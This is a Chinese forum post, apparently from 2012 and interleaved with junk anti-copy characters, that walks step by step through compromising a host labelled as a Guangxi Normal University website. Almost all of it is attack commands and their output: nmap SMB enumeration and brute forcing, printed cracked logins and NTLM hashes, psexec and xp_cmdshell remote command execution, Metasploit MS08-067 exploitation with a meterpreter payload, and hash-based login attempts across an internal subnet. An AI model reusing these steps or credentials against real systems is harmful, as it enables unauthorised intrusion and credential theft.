广西师范网站http://202.103.242.241/5 n1 F0 G0 a. ^' h
) e7 ?/ s1 I- @4 a
root@bt:~# nmap -sS -sV 202.103.242.241
( m1 S4 `6 a$ `: T' ~
: f# E$ [3 e& aStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
- Q% g0 o0 u I* w
! O* d3 c" Y6 k) Z5 q" Q: yNmap scan report for bogon (202.103.242.241). h2 M4 S" V0 z L. j/ R
6 j% {2 p( ~1 {$ L6 D* K4 t7 c$ ?
Host is up (0.00048s latency).
! j& h# D+ b4 g8 x& u4 @8 C3 W9 s3 z, N: Q7 ^0 A
Not shown: 993 closed ports
6 l" m* n# ]7 @5 Y- A
- L& h0 s- |' XPORT STATE SERVICE VERSION' a9 R0 h/ {% x& h
6 a1 w7 O$ x+ m% _( ?3 @135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)# r0 U1 |! F: g) u
+ F4 D/ g: K$ t* w: Y: P# ^; m8 @139/tcp open netbios-ssn" O0 f4 ?) i7 b: j' m* x6 ^3 s
# b0 d; x# m9 x9 }
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
& d; R% n$ U7 @3 w. N3 V7 i. x! h
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
* _6 s ]/ U; ?. {4 B. G
; D8 r3 o; H. \. Y" b1026/tcp open msrpc Microsoft Windows RPC7 s3 m( j5 R: e$ C. a7 R6 R
& `4 z4 t, z$ R- V3372/tcp open msdtc?4 i N" X2 s4 T" ^, {
' P1 n. Z2 H6 o7 p' ?% w) c
3389/tcp open ms-term-serv?
1 a$ X: B! s% V- v
7 B5 `* }9 y& b8 x' t$ l1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :+ G9 j) c, m9 T9 b4 n$ e
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r( Z7 \! h' I# E4 t- C& w/ B
4 ~% j& X' d# Q. y |; OSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions) m! L. k$ @. q; U/ g
, ^# a. Q! {1 V; P8 a9 y. T4 i9 {
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)9 ?# n; K/ i7 ]9 U4 R: d# W* {
3 i: W# F6 m5 p4 f# u
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO2 v6 S& P: a- m
0 `2 O3 ?9 a8 x, U# G9 cSF:ptions,6,”hO\n\x000Z”);
) p6 W7 q! C! v2 z* }- s: ~7 t" b$ e. l% Z. H# { ?4 A' Z
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
% I7 W; X" A+ b- Y) {
7 d; B; g% ~& }& BService Info: OS: Windows1 |8 n7 }3 \; w4 x
9 u! a O) U) f. t8 X+ B
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
5 s) T" L N/ N8 K; n0 x
/ q+ N7 F0 L* V5 K) G" w- ONmap done: 1 IP address (1 host up) scanned in 79.12 seconds
0 s- S* p$ J# L! U3 ?* p6 t' @% k; o- I* z
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本& t$ c) o' H, k( U: _7 j
' l/ c+ l T0 {7 y
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse: R5 f4 \5 c, m9 r
$ l6 g( {5 d. F6 d-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
8 I' N9 B1 z6 p' Y% Q# @3 w2 \: J* H- Q1 k( G0 N/ N
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
( C; @% ^& [$ a& L% _
1 g: J. x% G5 d9 ]$ A% `9 ?$ J-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
& `- _" @; ~$ } \
5 c" Y- J1 s6 B* `; j/ Q( H2 K-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse" }( u6 B9 i- r; {3 K: o% H# P- a
8 _0 H# S" [# i2 l
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
7 ]6 j0 n# g% e0 P3 h! j! G1 l1 \2 O( w' g1 @
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
# G) @+ ]# s! O8 a0 U' Y, C, }+ N2 t4 W6 y) i
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse+ R( @; f. v9 m
& h$ Z: ^: r: t
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
8 Q) Q5 ^! k+ P/ L, R- u2 y) P5 s3 N/ O8 a5 k) a4 j5 A+ \1 W
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
, V& v; k- f2 R! |
0 v/ W2 C% v2 [1 r' m/ Y7 M-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse3 I3 q2 Y& K( `, w6 o$ w
. y+ r+ k3 J2 @7 c-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
" p; h8 [; P4 t% ^- p' q- V
: n3 d% c( A6 ^! p% _+ m-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
2 M7 S- Q9 s( q6 K) K! o* ~# v- L! {# n3 L
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
* c6 F3 }& W, n9 d! s, ?2 y0 e
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
) V3 R) g& i& i
" C# q- r4 X. \root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
# E- K5 p. z4 |6 W7 y1 P1 @. u- O
5 @! `; ~" M$ Q: q) A//此乃使用脚本扫描远程机器所存在的账户名
- V9 H J# ^2 I; l' ~+ u
3 ]8 ^$ |# P' C1 T& M& B; E% E$ sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST" k6 x" @5 V/ D* s0 b: X7 H
% A% b7 b9 c% Z7 h$ u$ n4 L+ Z
Nmap scan report for bogon (202.103.242.241)
: y/ ?, @: f* D! x% |) l$ D# L" F3 d& Y
Host is up (0.00038s latency).( k/ o- c; Z4 f, t; @4 p
. _* G7 r; ]0 l7 Z0 w0 S
Not shown: 993 closed ports
" {. W D& ~& I2 z; i6 X7 B1 t* T; y1 H/ X$ N) v/ {% A8 j; [
PORT STATE SERVICE
4 Z# Z2 u+ w& r& r9 v# [2 y- j' \7 b$ h2 W
135/tcp open msrpc
' J8 J$ \, _. v1 A; Y, Y- J* A- N1 z# n- B# F
139/tcp open netbios-ssn* v' x1 V! e" L/ E: B8 q; y, O3 X. K
1 S, g1 A/ Q5 M
445/tcp open microsoft-ds% e% y7 z O1 S& s. y) D
2 D" g+ g* f" f/ p
1025/tcp open NFS-or-IIS3 n* I# p- j2 Z
8 h' P2 M/ p3 U" v) s
1026/tcp open LSA-or-nterm
# }, [; e" m, p& ?$ j5 E
?% W& v1 r, y6 U& c5 O( k1 c5 d3372/tcp open msdtc
$ Q7 p" |* `' A4 W3 H+ p3 k& k# H$ K) w
3389/tcp open ms-term-serv+ }( Z3 T2 a9 \( b: v% k8 x( R. b
) y- R! f) Q, }8 X% e+ b6 O: pMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 f; u% X) o1 n3 [
2 @0 X+ q0 C0 e1 z) B7 \8 THost script results:8 x" X- J2 p. k( O- d' l
, V) m# |2 y! l. T r5 i: `9 R6 D| smb-enum-users:
& r+ W9 U* j. y/ F4 F5 {: |& u
5 k3 _- E V% K4 i5 @% j|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果# m2 |" {- x m" P2 f2 }
) @5 [) S! y. M
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
\6 V% o; H& S0 k _" ~
* h( n# U& O, qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 , q3 E8 G9 x4 E0 h
* Q* _, z6 X* K; G//查看共享7 A$ R* l" j% l, T1 ~- W
. ?+ M" x: J/ M% C, r2 }9 c
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
8 E0 r: F' T; x2 V& z8 ~2 [5 g( ~! m
% q0 o# G2 x% ^0 P4 gNmap scan report for bogon (202.103.242.241)
' E w8 q+ D% D! D- f+ J3 a
8 J; I C2 ]7 p6 CHost is up (0.00035s latency).6 E0 w* L0 y& a c* J
# C0 S' @! |2 z' s& ~9 DNot shown: 993 closed ports
% _& J4 v) T! r$ A5 v
4 W( @, e; D+ L2 r5 m& vPORT STATE SERVICE8 Y m# e" P$ V2 I
2 M( f" X: B* z% E
135/tcp open msrpc
8 [" l* ?$ Z9 N) c6 H5 ]) ~# `) t6 M! p" O0 c; Q9 E' \- Y
139/tcp open netbios-ssn
! o4 b% z# f% d3 S$ W3 \
, c h3 V$ C g445/tcp open microsoft-ds
" O2 ^5 J* e2 v
7 H7 s! P5 f3 h/ E! q1025/tcp open NFS-or-IIS
5 R& k# F3 g1 G) w; x5 k3 A: I4 W* }. V$ _7 W+ b2 z
1026/tcp open LSA-or-nterm: d3 Q3 j4 W& N; F
& O) u# X5 d( w3372/tcp open msdtc
* Z" ?' \- n# o2 _ u$ I' _, g9 e& u( G3 H* P
3389/tcp open ms-term-serv
: e8 l8 w9 i( o# I6 ^7 p1 ~
3 [# H& ?1 x7 aMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)2 D2 v0 b) r3 {1 U- l ]
$ E/ R& n1 K. ?6 \Host script results: {; U b2 o" H+ d9 Z
/ i/ [# w* x' ], x| smb-enum-shares:
7 X( R3 _ z; K- U
: \) B! z2 ^! M) m$ B| ADMIN$
& H* |5 w# H# s3 L& q' p
* m' ?. r' r* F8 q; e4 L" i| Anonymous access: <none>
- K" k- b! x9 a
; L, Y* U# d. l( Y" n| C$
: @' G* r" k) q1 b U6 i: l" [1 m
4 e* m/ A' w; x. K* p& s| Anonymous access: <none>
) U, o2 s' d% q# m% {- L
; |) H4 P/ U, e3 e8 h( y9 C* x4 W3 D5 Q| IPC$& X3 R7 G- u9 P6 i2 J
$ ?6 G5 Z1 d: u% U% a8 r( V|_ Anonymous access: READ
! Q; }+ p9 m* `# z/ F2 C' s
( w8 Z0 ?0 ~/ U/ ?4 rNmap done: 1 IP address (1 host up) scanned in 1.05 seconds# ^! ?$ j5 |! C7 x
* W4 F N* ]" W) F2 M, rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 ! k T/ X2 Z4 S# p& w% ?- q
# {/ b0 d3 A% N( ?4 U5 \//获取用户密码) t6 |0 n3 `2 m' K$ n- V
, B! }/ P5 |- e( x9 M& m
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
4 O- Q8 v4 R/ X9 H) h5 F% {; H# V2 z1 e' a' E: _- p+ @
Nmap scan report for bogon (202.103.242.2418)
* f# n ]2 r" O* }7 ^1 @% r3 q" D% H b" ]# b2 N
Host is up (0.00041s latency).1 L6 \1 T2 `2 i' |0 \
4 F8 Y& R& p: x1 ?* x8 d; x
Not shown: 993 closed ports& \% A3 s4 I" E, Q* @, S2 U! W
5 Z) U3 L- |9 dPORT STATE SERVICE/ q- J5 n" R% I2 p. n$ U z* u8 ]0 N
/ Z0 K) {/ D; V; k. @- c135/tcp open msrpc
* Q2 }: k' v2 M3 v% M0 \& k y/ z) }( `
139/tcp open netbios-ssn
: T* T* C2 I0 O2 N( h( r0 i3 O- d* e" G7 e) B8 j. w
445/tcp open microsoft-ds
7 Y: @, P/ R' O, y
) L- P9 m2 r& i0 z8 N) v1025/tcp open NFS-or-IIS' D. @; e: I+ w* \) ?
# K4 w/ {# @: `* M2 x7 |1026/tcp open LSA-or-nterm" U: W* h( B3 L2 F5 K
! r6 c( ]0 s) l# v0 {3372/tcp open msdtc3 u# s* `4 S! @# x
9 o, ?7 y2 y6 z
3389/tcp open ms-term-serv$ e# J$ g/ J9 [+ d7 y1 ?
7 f1 ?' @ C$ g7 Y5 J$ Z* n& FMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( N( o" H& y* G+ `
* ^6 Y6 u1 k5 Q1 ?! |2 i3 K: PHost script results:1 z5 n: C3 q+ ~5 l- m
; h. i( U$ _7 l
| smb-brute:
* _, l$ n' M& O2 n4 n! v- `! ^" t, j( G% }. F+ |7 E
administrator:<blank> => Login was successful" O: T% @7 I! Q& X# B
$ s& [! y' B( ^5 N @ G|_ test:123456 => Login was successful% F/ [6 |1 a: G- }7 T
) I! a1 f, m( D8 P' g
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
3 y- }/ L5 k5 S: @5 \5 L' p' h( \- g) Y5 }9 c' E' W. A
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
; Q" C/ P& h7 G" x: ]3 t7 m* N. w: F' K
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data6 E' b, u$ |/ Q# Y
+ R: e6 B( {, G" ?7 v* v5 Y m( f9 R( r, lroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
! ~5 _* y! I1 V/ s- c
; P5 E, _6 O5 {1 w) A, Froot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1396 X3 V+ L$ Y4 J6 \- k R5 k
" x9 ^; Q' E$ C% s5 P' E; e5 ^/ y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST5 o+ G0 T7 L+ l1 S' J
; |/ |9 K0 F$ K# l% ^ g- {5 R
Nmap scan report for bogon (202.103.242.241)
: C% V5 B( w! H1 ~
* i! ~+ D" M( `+ u2 GHost is up (0.0012s latency).
_8 Q F9 c1 Y; a
! I' s9 m3 b6 CPORT STATE SERVICE- G) w0 F6 z% a0 M" z+ F/ E
2 ^' \5 H! ?$ Q! J
135/tcp open msrpc. T/ H- `- e$ ?# }' A2 b9 b
c* ?: g8 K) ^3 N- N/ E& ]
139/tcp open netbios-ssn
* @: I6 J/ H5 x, z- x+ M$ m6 B) \; ^# b
445/tcp open microsoft-ds% y4 F. J- |& G# U I
% w( _& e: L ]! D( J( u: |: P9 |MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 ~7 h' Y/ w3 J
" j7 X* v z+ L F" k: `, W& eHost script results:, f, x: s- T6 E7 V6 ?4 t5 l* \
. |4 ]. d( e. A+ E| smb-pwdump:& @/ j, _4 ]: J8 [5 e8 [6 [! y
! P) {# |/ p% E- n. I. v+ T5 w3 S- `
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************' j3 v4 P3 l; m: ^
P' q' f( K4 {' i; K5 S
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
7 l, Z4 V, L4 c% x2 v9 R$ t) Y# O; Q2 w' b7 k; U
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D46 `- y- c+ \' b
3 V1 ^* H: z/ M% j5 t' l$ d|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2 K" L/ ~+ r/ a5 K/ k- }# u. I
5 u9 u. |. j# dNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
9 U: P2 g# b% w
5 g3 x7 s, z% F H# s. ^C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell8 n# t+ f; H: P
3 g# D9 Q$ x+ J( u; H5 O-p 123456 -e cmd.exe% @( `( T+ g! N3 z( s( C2 H W6 @
9 r& G3 j' Y4 ]PsExec v1.55 – Execute processes remotely! x% C* g% |- \( _; d' A
9 q, j! C; [- r; i1 W: I% I0 FCopyright (C) 2001-2004 Mark Russinovich4 e" c$ x; \% v) I+ R+ j
' C# E, z4 w. N' OSysinternals – www.sysinternals.com
5 p1 `2 ?" U2 X9 t( C$ {, h
' d" f9 x7 H$ g i7 ?5 _$ MMicrosoft Windows 2000 [Version 5.00.2195]* e" q. c( Z+ I d
/ `- X5 w; U# h8 ? I$ x1 f
(C) 版权所有 1985-2000 Microsoft Corp.
2 }: A! @$ I) N! S/ A9 O9 S8 b$ ?& o! X
C:\WINNT\system32>ipconfig- T9 C, V- B/ r3 r' w: ?
- q2 m& Y5 a% D* x) l" j gWindows 2000 IP Configuration
0 C( b. ^; i$ i9 T% H# c6 v, ~: Q. l$ P
Ethernet adapter 本地连接:* `' }2 ~1 T% J' C& P; E7 q
7 I0 Z5 C( ? S% }9 U. p, D. v
Connection-specific DNS Suffix . :6 y6 Q) w8 p& v: D l
$ a# X; ^. n+ O
IP Address. . . . . . . . . . . . : 202.103.242.241
6 s/ L' K+ i+ i# f: Y
! [4 F" n- a" OSubnet Mask . . . . . . . . . . . : 255.255.255.06 x: R$ k- z. m6 [. f3 z
8 e. t. ?" {0 `" C9 t
Default Gateway . . . . . . . . . : 202.103.1.1
4 }8 F* j) F: C6 o/ y% |. C' a0 {7 r- M/ l. {7 B
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令5 P' e6 l+ y$ Y) j: ^
$ V0 w& ]& ]4 c3 j9 i1 m# m/ G$ h# Troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞3 i y) F% X9 [: w
) J9 _% [# d) ~3 m) f1 f# wStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST' \8 X* a6 |# X: b( \6 d# n8 y% F' \
8 ~- i0 q' W8 _8 B0 q4 n- \+ ]% C: A
Nmap scan report for bogon (202.103.242.241)+ u! ~, n2 F" S2 ^
( j3 c4 L. V; i1 z% e4 {6 JHost is up (0.00046s latency).
$ v/ G$ C+ r3 o9 J2 n- ^, r. O. `4 R- K& _+ c
Not shown: 993 closed ports
9 p$ h: a8 J% x
3 V: P0 [: U% CPORT STATE SERVICE+ t4 l. E# R! P- h' R6 B5 D- s9 T$ f
$ Y) o! o8 u6 Y; ?' i6 O
135/tcp open msrpc
1 ?+ r" A) d- u' u; U$ X1 G( {$ _) j( z
139/tcp open netbios-ssn
- a3 W# i6 K3 ^+ o- l% v; X0 G2 F# H/ H u" E. f
445/tcp open microsoft-ds
8 P- l* r% t8 z& c* F- k- M0 U2 h$ d( ?6 B
1025/tcp open NFS-or-IIS0 n- O# d$ A# r6 b' _
3 w0 R/ L& [% G2 p: j T1026/tcp open LSA-or-nterm* b( K. n* l9 a
! ~5 `7 c& o8 I& ]- ?4 I3372/tcp open msdtc$ c7 m& `" y: g9 L5 @
$ T& Y& T( |# c5 O- l3389/tcp open ms-term-serv- l. {- T% E: q$ U% }( M
9 |3 F5 j, K2 y2 v2 d
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
) {6 R! A8 l/ ]1 h2 s+ g( B* k% K0 v# T8 H5 \: P
Host script results:
7 M4 O6 R0 s8 R- e* m
. u' I$ Q9 c% z3 v$ K- Y+ t| smb-check-vulns:! H0 c3 W9 X; t( g- R* S
! X0 Y; Y3 |$ s
|_ MS08-067: VULNERABLE
. [" n C j9 L1 G' O. R. q4 b3 L K/ T0 V
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
5 L/ u! e; j/ i# H7 k8 E) k% O
' N9 k' K& C9 |- ^7 d& I' I- froot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出1 R8 @. U/ B% A, H6 D8 d: M+ J
* `# j9 i0 ?7 v6 U$ G7 L
msf > search ms08
1 `; z E6 d b. G( r' T! A; f6 E+ T, G! w
msf > use exploit/windows/smb/ms08_067_netapi% s0 b+ v. a; l c9 S
% ]4 k& P# F0 |msf exploit(ms08_067_netapi) > show options
' l0 ~( J+ Y5 A$ r, L/ s, [; h0 Q% i+ \# \! e! o6 _8 N
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
O6 c# t3 r; Q6 ]
, X, ^/ f; i, F% H: W( ^msf exploit(ms08_067_netapi) > show payloads, \% B! s+ D. d' e8 Q/ O
/ ~# r8 c$ J$ _' X+ s1 c8 Q, Vmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
+ }7 w: U8 f- O) o |0 o: x/ x) F; s; q5 t2 V: P
msf exploit(ms08_067_netapi) > exploit
+ Z$ U7 p* c5 B- J& f8 T& u" O$ e" d: y7 d; |3 n. ^
meterpreter >
6 A2 F f; {! x+ d4 j3 x K5 l+ I# M/ ^: `/ I) e
Background session 2? [y/N] (ctrl+z)' y5 m9 w) \* ^0 z
* |5 K6 a( Q3 ~! W3 F: f) R/ ?msf exploit(ms08_067_netapi) > sessions -l
; w" P, |% @$ Q0 J: {. c% F8 X. F0 x
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
( h( b0 K* j" ]7 L) `( k
/ |+ t: w0 s' H" Q2 j* C0 ftest
9 \/ R6 U5 v$ M5 X/ `. [) r1 u& V
administrator
) B( a7 K& E1 I" o! T5 Z, v- X V, e7 V) ~ L3 w
root@bt:/usr/local/share/nmap/scripts# vim password.txt
% a0 L7 |, d8 M- P4 y7 [$ E; E4 c' A
44EFCE164AB921CAAAD3B435B51404EE8 D6 r- K; ~; L5 `3 \% @
% T8 Q) c# S( S- |root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ( U4 D$ t W7 t" ]2 k) h/ o
' @# e. ^2 Q' J, F( O+ D7 c9 @9 I //利用用户名跟获取的hash尝试对整段内网进行登录
/ f- G$ Y' H1 Z; P# a+ S( q0 t' t6 f0 Q/ B" j( o
Nmap scan report for 192.168.1.105) P! ~& {/ t E7 \$ P
) g" n( ?" q- k' N9 V3 W# Y6 XHost is up (0.00088s latency).
+ g# q3 ^) ~" ~! u: [' n
. V9 z& W, `8 y6 W$ c2 aNot shown: 993 closed ports8 u4 u/ H+ D$ k; y6 f+ w% W
! A- T1 u% _ W5 ^1 a- tPORT STATE SERVICE
" {* D6 b% A* V2 y# o# U
( A' R7 W1 ]) N7 B) R- E135/tcp open msrpc
! _* m: w/ g# z: Y1 p" ~
% y$ a8 R; x, V7 X6 s6 q9 G139/tcp open netbios-ssn
8 f b, H) P) Z4 N) \7 o" k( X6 m) D% l, f9 |5 k
445/tcp open microsoft-ds
: e: g: D7 M7 E, r& v: @ O5 ~# p( @9 `2 m5 S9 R. u
1025/tcp open NFS-or-IIS
9 C' a0 R/ s* x5 Z! |/ z! M( ?( r1 h3 X0 Y2 S; W/ F# V' ?
1026/tcp open LSA-or-nterm
; L! N, E# {% |! g8 k5 t$ g* m6 i! K
3372/tcp open msdtc
" F% \2 a/ H1 [0 b- }0 Y; i* w) A5 Q$ u9 q7 V/ e
3389/tcp open ms-term-serv/ s! a# [1 w1 O* [+ N) v, _" P
" U6 ~, K. S1 d0 o' u- B: t
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* L# n/ \0 n, z. c. z' N4 J: E% S% a2 E4 d( A0 D
Host script results:2 u' F4 N! P) d
8 J) d9 c4 k9 s| smb-brute:$ B0 n' y5 W9 ~& o9 H
$ U2 v4 i1 R# W
|_ administrator:<blank> => Login was successful2 d( \9 x1 N' Q3 G
3 G: C* R- O3 `' w
攻击成功,一个简单的msf+nmap攻击~~·
; J* l7 V, u6 C! B7 I9 f% h) y2 X& x3 U6 O$ g6 Q4 t
|
发表于 2012-12-4 12:46:42
收藏
支持
反对